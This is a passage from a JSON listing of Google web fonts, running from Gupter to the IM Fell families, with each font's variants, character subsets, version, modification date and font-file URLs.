        "500": "http://fonts.gstatic.com/s/gupter/v2/2-cl9JNmxJqPO1Qslb-bUsT5rZhaZg.ttf",
        "700": "http://fonts.gstatic.com/s/gupter/v2/2-cl9JNmxJqPO1Qs3bmbUsT5rZhaZg.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Gurajada",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "telugu"
      ],
      "version": "v9",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/gurajada/v9/FwZY7-Qx308m-l-0Kd6A4sijpFu_.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Habibi",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/habibi/v9/CSR-4zFWkuqcTTNCShJeZOYySQ.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Halant",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
        "300": "http://fonts.gstatic.com/s/halant/v8/u-490qaujRI2Pbsvc_pCmwZqcwdRXg.ttf",
        "regular": "http://fonts.gstatic.com/s/halant/v8/u-4-0qaujRI2PbsX39Jmky12eg.ttf",
        "500": "http://fonts.gstatic.com/s/halant/v8/u-490qaujRI2PbsvK_tCmwZqcwdRXg.ttf",
        "600": "http://fonts.gstatic.com/s/halant/v8/u-490qaujRI2PbsvB_xCmwZqcwdRXg.ttf",
        "700": "http://fonts.gstatic.com/s/halant/v8/u-490qaujRI2PbsvY_1CmwZqcwdRXg.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Hammersmith One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v12",
      "lastModified": "2020-11-06",
      "files": {
        "regular": "http://fonts.gstatic.com/s/hammersmithone/v12/qWcyB624q4L_C4jGQ9IK0O_dFlnbshsks4MRXw.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Hanalei",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/hanalei/v11/E21n_dD8iufIjBRHXzgmVydREus.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Hanalei Fill",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/hanaleifill/v9/fC1mPYtObGbfyQznIaQzPQiMVwLBplm9aw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Handlee",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/handlee/v9/-F6xfjBsISg9aMakDmr6oilJ3ik.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Hanuman",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "khmer"
      ],
      "version": "v14",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/hanuman/v14/VuJxdNvD15HhpJJBeKbXOIFneRo.ttf",
        "700": "http://fonts.gstatic.com/s/hanuman/v14/VuJ0dNvD15HhpJJBQBr4HIlMZRNcp0o.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Happy Monkey",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/happymonkey/v9/K2F2fZZcl-9SXwl5F_C4R_OABwD2bWqVjw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Harmattan",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "arabic",
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/harmattan/v9/goksH6L2DkFvVvRp9XpTS0CjkP1Yog.ttf",
        "700": "http://fonts.gstatic.com/s/harmattan/v9/gokpH6L2DkFvVvRp9Xpr92-HmNZEq6TTFw.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Headland One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/headlandone/v8/yYLu0hHR2vKnp89Tk1TCq3Tx0PlTeZ3mJA.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Heebo",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "hebrew",
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-06-26",
      "files": {
        "100": "http://fonts.gstatic.com/s/heebo/v9/NGSpv5_NC0k9P_v6ZUCbLRAHxK1EiS2cckOnz02SXQ.ttf",
        "200": "http://fonts.gstatic.com/s/heebo/v9/NGSpv5_NC0k9P_v6ZUCbLRAHxK1ECSycckOnz02SXQ.ttf",
        "300": "http://fonts.gstatic.com/s/heebo/v9/NGSpv5_NC0k9P_v6ZUCbLRAHxK1E1yycckOnz02SXQ.ttf",
        "regular": "http://fonts.gstatic.com/s/heebo/v9/NGSpv5_NC0k9P_v6ZUCbLRAHxK1EiSycckOnz02SXQ.ttf",
        "500": "http://fonts.gstatic.com/s/heebo/v9/NGSpv5_NC0k9P_v6ZUCbLRAHxK1EuyycckOnz02SXQ.ttf",
        "600": "http://fonts.gstatic.com/s/heebo/v9/NGSpv5_NC0k9P_v6ZUCbLRAHxK1EVyucckOnz02SXQ.ttf",
        "700": "http://fonts.gstatic.com/s/heebo/v9/NGSpv5_NC0k9P_v6ZUCbLRAHxK1EbiucckOnz02SXQ.ttf",
        "800": "http://fonts.gstatic.com/s/heebo/v9/NGSpv5_NC0k9P_v6ZUCbLRAHxK1ECSucckOnz02SXQ.ttf",
        "900": "http://fonts.gstatic.com/s/heebo/v9/NGSpv5_NC0k9P_v6ZUCbLRAHxK1EICucckOnz02SXQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Henny Penny",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/hennypenny/v8/wXKvE3UZookzsxz_kjGSfMQqt3M7tMDT.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Hepta Slab",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v8",
      "lastModified": "2020-06-26",
      "files": {
        "100": "http://fonts.gstatic.com/s/heptaslab/v8/ea8JadoyU_jkHdalebHvyWVNdYoIsHe5HvkV5jfbY5B0NBkz.ttf",
        "200": "http://fonts.gstatic.com/s/heptaslab/v8/ea8JadoyU_jkHdalebHvyWVNdYoIsHe5HvmV5zfbY5B0NBkz.ttf",
        "300": "http://fonts.gstatic.com/s/heptaslab/v8/ea8JadoyU_jkHdalebHvyWVNdYoIsHe5HvlL5zfbY5B0NBkz.ttf",
        "regular": "http://fonts.gstatic.com/s/heptaslab/v8/ea8JadoyU_jkHdalebHvyWVNdYoIsHe5HvkV5zfbY5B0NBkz.ttf",
        "500": "http://fonts.gstatic.com/s/heptaslab/v8/ea8JadoyU_jkHdalebHvyWVNdYoIsHe5Hvkn5zfbY5B0NBkz.ttf",
        "600": "http://fonts.gstatic.com/s/heptaslab/v8/ea8JadoyU_jkHdalebHvyWVNdYoIsHe5HvnL4DfbY5B0NBkz.ttf",
        "700": "http://fonts.gstatic.com/s/heptaslab/v8/ea8JadoyU_jkHdalebHvyWVNdYoIsHe5Hvny4DfbY5B0NBkz.ttf",
        "800": "http://fonts.gstatic.com/s/heptaslab/v8/ea8JadoyU_jkHdalebHvyWVNdYoIsHe5HvmV4DfbY5B0NBkz.ttf",
        "900": "http://fonts.gstatic.com/s/heptaslab/v8/ea8JadoyU_jkHdalebHvyWVNdYoIsHe5Hvm84DfbY5B0NBkz.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Herr Von Muellerhoff",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/herrvonmuellerhoff/v10/WBL6rFjRZkREW8WqmCWYLgCkQKXb4CAft3c6_qJY3QPQ.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Hi Melody",
      "variants": [
        "regular"
      ],
      "subsets": [
        "korean",
        "latin"
      ],
      "version": "v8",
      "lastModified": "2019-07-16",
      "files": {
        "regular": "http://fonts.gstatic.com/s/himelody/v8/46ktlbP8Vnz0pJcqCTbEf29E31BBGA.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Hind",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-09-10",
      "files": {
        "300": "http://fonts.gstatic.com/s/hind/v11/5aU19_a8oxmIfMJaIRuYjDpf5Vw.ttf",
        "regular": "http://fonts.gstatic.com/s/hind/v11/5aU69_a8oxmIRG5yBROzkDM.ttf",
        "500": "http://fonts.gstatic.com/s/hind/v11/5aU19_a8oxmIfJpbIRuYjDpf5Vw.ttf",
        "600": "http://fonts.gstatic.com/s/hind/v11/5aU19_a8oxmIfLZcIRuYjDpf5Vw.ttf",
        "700": "http://fonts.gstatic.com/s/hind/v11/5aU19_a8oxmIfNJdIRuYjDpf5Vw.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Hind Guntur",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "telugu"
      ],
      "version": "v7",
      "lastModified": "2020-11-06",
      "files": {
        "300": "http://fonts.gstatic.com/s/hindguntur/v7/wXKyE3UZrok56nvamSuJd_yGn1czn9zaj5Ju.ttf",
        "regular": "http://fonts.gstatic.com/s/hindguntur/v7/wXKvE3UZrok56nvamSuJd8Qqt3M7tMDT.ttf",
        "500": "http://fonts.gstatic.com/s/hindguntur/v7/wXKyE3UZrok56nvamSuJd_zenlczn9zaj5Ju.ttf",
        "600": "http://fonts.gstatic.com/s/hindguntur/v7/wXKyE3UZrok56nvamSuJd_zymVczn9zaj5Ju.ttf",
        "700": "http://fonts.gstatic.com/s/hindguntur/v7/wXKyE3UZrok56nvamSuJd_yWmFczn9zaj5Ju.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Hind Madurai",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "tamil"
      ],
      "version": "v6",
      "lastModified": "2020-09-02",
      "files": {
        "300": "http://fonts.gstatic.com/s/hindmadurai/v6/f0Xu0e2p98ZvDXdZQIOcpqjfXaUnecsoMJ0b_g.ttf",
        "regular": "http://fonts.gstatic.com/s/hindmadurai/v6/f0Xx0e2p98ZvDXdZQIOcpqjn8Y0DceA0OQ.ttf",
        "500": "http://fonts.gstatic.com/s/hindmadurai/v6/f0Xu0e2p98ZvDXdZQIOcpqjfBaQnecsoMJ0b_g.ttf",
        "600": "http://fonts.gstatic.com/s/hindmadurai/v6/f0Xu0e2p98ZvDXdZQIOcpqjfKaMnecsoMJ0b_g.ttf",
        "700": "http://fonts.gstatic.com/s/hindmadurai/v6/f0Xu0e2p98ZvDXdZQIOcpqjfTaInecsoMJ0b_g.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Hind Siliguri",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "bengali",
        "latin",
        "latin-ext"
      ],
      "version": "v7",
      "lastModified": "2020-09-10",
      "files": {
        "300": "http://fonts.gstatic.com/s/hindsiliguri/v7/ijwOs5juQtsyLLR5jN4cxBEoRDf44uEfKiGvxts.ttf",
        "regular": "http://fonts.gstatic.com/s/hindsiliguri/v7/ijwTs5juQtsyLLR5jN4cxBEofJvQxuk0Nig.ttf",
        "500": "http://fonts.gstatic.com/s/hindsiliguri/v7/ijwOs5juQtsyLLR5jN4cxBEoRG_54uEfKiGvxts.ttf",
        "600": "http://fonts.gstatic.com/s/hindsiliguri/v7/ijwOs5juQtsyLLR5jN4cxBEoREP-4uEfKiGvxts.ttf",
        "700": "http://fonts.gstatic.com/s/hindsiliguri/v7/ijwOs5juQtsyLLR5jN4cxBEoRCf_4uEfKiGvxts.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Hind Vadodara",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "gujarati",
        "latin",
        "latin-ext"
      ],
      "version": "v7",
      "lastModified": "2020-09-02",
      "files": {
        "300": "http://fonts.gstatic.com/s/hindvadodara/v7/neIQzCKvrIcn5pbuuuriV9tTSDn3iXM0oSOL2Yw.ttf",
        "regular": "http://fonts.gstatic.com/s/hindvadodara/v7/neINzCKvrIcn5pbuuuriV9tTcJXfrXsfvSo.ttf",
        "500": "http://fonts.gstatic.com/s/hindvadodara/v7/neIQzCKvrIcn5pbuuuriV9tTSGH2iXM0oSOL2Yw.ttf",
        "600": "http://fonts.gstatic.com/s/hindvadodara/v7/neIQzCKvrIcn5pbuuuriV9tTSE3xiXM0oSOL2Yw.ttf",
        "700": "http://fonts.gstatic.com/s/hindvadodara/v7/neIQzCKvrIcn5pbuuuriV9tTSCnwiXM0oSOL2Yw.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Holtwood One SC",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/holtwoodonesc/v11/yYLx0hLR0P-3vMFSk1TCq3Txg5B3cbb6LZttyg.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Homemade Apple",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/homemadeapple/v11/Qw3EZQFXECDrI2q789EKQZJob3x9Vnksi4M7.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Homenaje",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/homenaje/v10/FwZY7-Q-xVAi_l-6Ld6A4sijpFu_.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "IBM Plex Mono",
      "variants": [
        "100",
        "100italic",
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v6",
      "lastModified": "2020-09-02",
      "files": {
        "100": "http://fonts.gstatic.com/s/ibmplexmono/v6/-F6pfjptAgt5VM-kVkqdyU8n3kwq0n1hj-sNFQ.ttf",
        "100italic": "http://fonts.gstatic.com/s/ibmplexmono/v6/-F6rfjptAgt5VM-kVkqdyU8n1ioStndlre4dFcFh.ttf",
        "200": "http://fonts.gstatic.com/s/ibmplexmono/v6/-F6qfjptAgt5VM-kVkqdyU8n3uAL8ldPg-IUDNg.ttf",
        "200italic": "http://fonts.gstatic.com/s/ibmplexmono/v6/-F6sfjptAgt5VM-kVkqdyU8n1ioSGlZFh8ARHNh4zg.ttf",
        "300": "http://fonts.gstatic.com/s/ibmplexmono/v6/-F6qfjptAgt5VM-kVkqdyU8n3oQI8ldPg-IUDNg.ttf",
        "300italic": "http://fonts.gstatic.com/s/ibmplexmono/v6/-F6sfjptAgt5VM-kVkqdyU8n1ioSflVFh8ARHNh4zg.ttf",
        "regular": "http://fonts.gstatic.com/s/ibmplexmono/v6/-F63fjptAgt5VM-kVkqdyU8n5igg1l9kn-s.ttf",
        "italic": "http://fonts.gstatic.com/s/ibmplexmono/v6/-F6pfjptAgt5VM-kVkqdyU8n1ioq0n1hj-sNFQ.ttf",
        "500": "http://fonts.gstatic.com/s/ibmplexmono/v6/-F6qfjptAgt5VM-kVkqdyU8n3twJ8ldPg-IUDNg.ttf",
        "500italic": "http://fonts.gstatic.com/s/ibmplexmono/v6/-F6sfjptAgt5VM-kVkqdyU8n1ioSJlRFh8ARHNh4zg.ttf",
        "600": "http://fonts.gstatic.com/s/ibmplexmono/v6/-F6qfjptAgt5VM-kVkqdyU8n3vAO8ldPg-IUDNg.ttf",
        "600italic": "http://fonts.gstatic.com/s/ibmplexmono/v6/-F6sfjptAgt5VM-kVkqdyU8n1ioSClNFh8ARHNh4zg.ttf",
        "700": "http://fonts.gstatic.com/s/ibmplexmono/v6/-F6qfjptAgt5VM-kVkqdyU8n3pQP8ldPg-IUDNg.ttf",
        "700italic": "http://fonts.gstatic.com/s/ibmplexmono/v6/-F6sfjptAgt5VM-kVkqdyU8n1ioSblJFh8ARHNh4zg.ttf"
      },
      "category": "monospace",
      "kind": "webfonts#webfont"
    },
    {
      "family": "IBM Plex Sans",
      "variants": [
        "100",
        "100italic",
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v8",
      "lastModified": "2020-09-10",
      "files": {
        "100": "http://fonts.gstatic.com/s/ibmplexsans/v8/zYX-KVElMYYaJe8bpLHnCwDKjbLeEKxIedbzDw.ttf",
        "100italic": "http://fonts.gstatic.com/s/ibmplexsans/v8/zYX8KVElMYYaJe8bpLHnCwDKhdTmdKZMW9PjD3N8.ttf",
        "200": "http://fonts.gstatic.com/s/ibmplexsans/v8/zYX9KVElMYYaJe8bpLHnCwDKjR7_MIZmdd_qFmo.ttf",
        "200italic": "http://fonts.gstatic.com/s/ibmplexsans/v8/zYX7KVElMYYaJe8bpLHnCwDKhdTm2Idscf3vBmpl8A.ttf",
        "300": "http://fonts.gstatic.com/s/ibmplexsans/v8/zYX9KVElMYYaJe8bpLHnCwDKjXr8MIZmdd_qFmo.ttf",
        "300italic": "http://fonts.gstatic.com/s/ibmplexsans/v8/zYX7KVElMYYaJe8bpLHnCwDKhdTmvIRscf3vBmpl8A.ttf",
        "regular": "http://fonts.gstatic.com/s/ibmplexsans/v8/zYXgKVElMYYaJe8bpLHnCwDKtdbUFI5NadY.ttf",
        "italic": "http://fonts.gstatic.com/s/ibmplexsans/v8/zYX-KVElMYYaJe8bpLHnCwDKhdTeEKxIedbzDw.ttf",
        "500": "http://fonts.gstatic.com/s/ibmplexsans/v8/zYX9KVElMYYaJe8bpLHnCwDKjSL9MIZmdd_qFmo.ttf",
        "500italic": "http://fonts.gstatic.com/s/ibmplexsans/v8/zYX7KVElMYYaJe8bpLHnCwDKhdTm5IVscf3vBmpl8A.ttf",
        "600": "http://fonts.gstatic.com/s/ibmplexsans/v8/zYX9KVElMYYaJe8bpLHnCwDKjQ76MIZmdd_qFmo.ttf",
        "600italic": "http://fonts.gstatic.com/s/ibmplexsans/v8/zYX7KVElMYYaJe8bpLHnCwDKhdTmyIJscf3vBmpl8A.ttf",
        "700": "http://fonts.gstatic.com/s/ibmplexsans/v8/zYX9KVElMYYaJe8bpLHnCwDKjWr7MIZmdd_qFmo.ttf",
        "700italic": "http://fonts.gstatic.com/s/ibmplexsans/v8/zYX7KVElMYYaJe8bpLHnCwDKhdTmrINscf3vBmpl8A.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "IBM Plex Sans Condensed",
      "variants": [
        "100",
        "100italic",
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v7",
      "lastModified": "2020-07-23",
      "files": {
        "100": "http://fonts.gstatic.com/s/ibmplexsanscondensed/v7/Gg8nN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHY7KyKvBgYsMDhM.ttf",
        "100italic": "http://fonts.gstatic.com/s/ibmplexsanscondensed/v7/Gg8hN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHYas8M_LhakJHhOgBg.ttf",
        "200": "http://fonts.gstatic.com/s/ibmplexsanscondensed/v7/Gg8gN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHY5m6Yvrr4cFFwq5.ttf",
        "200italic": "http://fonts.gstatic.com/s/ibmplexsanscondensed/v7/Gg8iN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHYas8GPqpYMnEhq5H1w.ttf",
        "300": "http://fonts.gstatic.com/s/ibmplexsanscondensed/v7/Gg8gN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHY4C6ovrr4cFFwq5.ttf",
        "300italic": "http://fonts.gstatic.com/s/ibmplexsanscondensed/v7/Gg8iN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHYas8AfppYMnEhq5H1w.ttf",
        "regular": "http://fonts.gstatic.com/s/ibmplexsanscondensed/v7/Gg8lN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHbauwq_jhJsM.ttf",
        "italic": "http://fonts.gstatic.com/s/ibmplexsanscondensed/v7/Gg8nN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHYasyKvBgYsMDhM.ttf",
        "500": "http://fonts.gstatic.com/s/ibmplexsanscondensed/v7/Gg8gN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHY5a64vrr4cFFwq5.ttf",
        "500italic": "http://fonts.gstatic.com/s/ibmplexsanscondensed/v7/Gg8iN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHYas8F_opYMnEhq5H1w.ttf",
        "600": "http://fonts.gstatic.com/s/ibmplexsanscondensed/v7/Gg8gN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHY527Ivrr4cFFwq5.ttf",
        "600italic": "http://fonts.gstatic.com/s/ibmplexsanscondensed/v7/Gg8iN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHYas8HPvpYMnEhq5H1w.ttf",
        "700": "http://fonts.gstatic.com/s/ibmplexsanscondensed/v7/Gg8gN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHY4S7Yvrr4cFFwq5.ttf",
        "700italic": "http://fonts.gstatic.com/s/ibmplexsanscondensed/v7/Gg8iN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHYas8BfupYMnEhq5H1w.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "IBM Plex Serif",
      "variants": [
        "100",
        "100italic",
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "100": "http://fonts.gstatic.com/s/ibmplexserif/v9/jizBREVNn1dOx-zrZ2X3pZvkTi182zIZj1bIkNo.ttf",
        "100italic": "http://fonts.gstatic.com/s/ibmplexserif/v9/jizHREVNn1dOx-zrZ2X3pZvkTiUa41YTi3TNgNq55w.ttf",
        "200": "http://fonts.gstatic.com/s/ibmplexserif/v9/jizAREVNn1dOx-zrZ2X3pZvkTi3Q-hIzoVrBicOg.ttf",
        "200italic": "http://fonts.gstatic.com/s/ibmplexserif/v9/jizGREVNn1dOx-zrZ2X3pZvkTiUa4_oyq17jjNOg_oc.ttf",
        "300": "http://fonts.gstatic.com/s/ibmplexserif/v9/jizAREVNn1dOx-zrZ2X3pZvkTi20-RIzoVrBicOg.ttf",
        "300italic": "http://fonts.gstatic.com/s/ibmplexserif/v9/jizGREVNn1dOx-zrZ2X3pZvkTiUa454xq17jjNOg_oc.ttf",
        "regular": "http://fonts.gstatic.com/s/ibmplexserif/v9/jizDREVNn1dOx-zrZ2X3pZvkThUY0TY7ikbI.ttf",
        "italic": "http://fonts.gstatic.com/s/ibmplexserif/v9/jizBREVNn1dOx-zrZ2X3pZvkTiUa2zIZj1bIkNo.ttf",
        "500": "http://fonts.gstatic.com/s/ibmplexserif/v9/jizAREVNn1dOx-zrZ2X3pZvkTi3s-BIzoVrBicOg.ttf",
        "500italic": "http://fonts.gstatic.com/s/ibmplexserif/v9/jizGREVNn1dOx-zrZ2X3pZvkTiUa48Ywq17jjNOg_oc.ttf",
        "600": "http://fonts.gstatic.com/s/ibmplexserif/v9/jizAREVNn1dOx-zrZ2X3pZvkTi3A_xIzoVrBicOg.ttf",
        "600italic": "http://fonts.gstatic.com/s/ibmplexserif/v9/jizGREVNn1dOx-zrZ2X3pZvkTiUa4-o3q17jjNOg_oc.ttf",
        "700": "http://fonts.gstatic.com/s/ibmplexserif/v9/jizAREVNn1dOx-zrZ2X3pZvkTi2k_hIzoVrBicOg.ttf",
        "700italic": "http://fonts.gstatic.com/s/ibmplexserif/v9/jizGREVNn1dOx-zrZ2X3pZvkTiUa4442q17jjNOg_oc.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "IM Fell DW Pica",
      "variants": [
        "regular",
        "italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/imfelldwpica/v10/2sDGZGRQotv9nbn2qSl0TxXVYNw9ZAPUvi88MQ.ttf",
        "italic": "http://fonts.gstatic.com/s/imfelldwpica/v10/2sDEZGRQotv9nbn2qSl0TxXVYNwNZgnQnCosMXm0.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "IM Fell DW Pica SC",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/imfelldwpicasc/v10/0ybjGCAu5PfqkvtGVU15aBhXz3EUrnTW-BiKEUiBGA.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "IM Fell Double Pica",
      "variants": [
        "regular",
        "italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/imfelldoublepica/v10/3XF2EqMq_94s9PeKF7Fg4gOKINyMtZ8rT0S1UL5Ayp0.ttf",
        "italic": "http://fonts.gstatic.com/s/imfelldoublepica/v10/3XF0EqMq_94s9PeKF7Fg4gOKINyMtZ8rf0a_VJxF2p2G8g.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "IM Fell Double Pica SC",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/imfelldoublepicasc/v10/neIazDmuiMkFo6zj_sHpQ8teNbWlwBB_hXjJ4Y0Eeru2dGg.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "IM Fell English",
      "variants": [
        "regular",
        "italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/imfellenglish/v10/Ktk1ALSLW8zDe0rthJysWrnLsAz3F6mZVY9Y5w.ttf",
        "italic": "http://fonts.gstatic.com/s/imfellenglish/v10/Ktk3ALSLW8zDe0rthJysWrnLsAzHFaOdd4pI59zg.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "IM Fell English SC",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/imfellenglishsc/v10/a8IENpD3CDX-4zrWfr1VY879qFF05pZLO4gOg0shzA.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "IM Fell French Canon",
      "variants": [
        "regular",
        "italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
